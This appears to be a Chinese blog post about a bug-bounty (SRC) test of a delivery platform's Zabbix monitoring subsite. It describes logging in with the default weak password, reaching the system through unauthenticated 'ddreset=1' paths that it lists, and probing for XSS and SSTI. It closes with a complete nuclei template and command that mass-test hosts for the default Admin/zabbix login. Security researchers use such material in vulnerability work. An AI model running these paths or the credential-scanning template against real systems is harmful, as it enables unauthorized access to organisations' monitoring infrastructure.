玖叶教程网

前端编程开发入门

某配送平台SRC未授权访问和弱口令

找到一个某src的子站,通过信息收集插件,发现ZABBIX-监控系统,可以日一下

使用谷歌搜索历史漏洞:zabbix漏洞


通过目录扫描扫描到后台,谷歌搜索一下有没有默认弱口令



成功进去了,挖洞就是这么简单

搜索文章还报过未授权访问漏洞,打一波

/overview.php?ddreset=1
/srv_status.php?ddreset=1
/latest.php?ddreset=1
/zabbix.php?action=problem.view&ddreset=1


又成功进去了,已经清除缓存在拼接路径的,进去成功寻找功能点,在搜索位置输入任何东西,前端页面就会显示什么,猜测可能存在反射xss,但没什么用,继续测试ssti注入


不存在,这个站还可以getshell,但是点到位置,后台进去了,人也进去了
黑盒测试ssti注入这个工具推荐一下,用这个工具还挖出过几个洞,这个感觉已经是公开最好的工具了:https://github.com/vladko312/SSTImap

顺便写了一个nuclei批量默认密码验证脚本

【Nuclei-Poc】

id: zabbix-default-credential-check

info:
  name: Zabbix Default Credential Check
  author: 
  severity: high
  description: Check for default credentials in Zabbix.
  tags: zabbix,default,cred

requests:
  - method: POST
    path:
      - "{{BaseURL}}/zabbix/index.php"

    body: |
      name=Admin&password=zabbix&autologin=1&enter=Sign+in

    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Connection: close
      Upgrade-Insecure-Requests: 1
      Origin: "{{BaseURL}}"
      Referer: "{{BaseURL}}/zabbix/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Location: zabbix.php?action=dashboard.view"
        part: header

      - type: status
        status:
          - 302

【验证】

.\nuclei -l xx.txt -t xx.yaml

发表评论:

控制面板
您好,欢迎到访网站!
  查看权限
网站分类
最新留言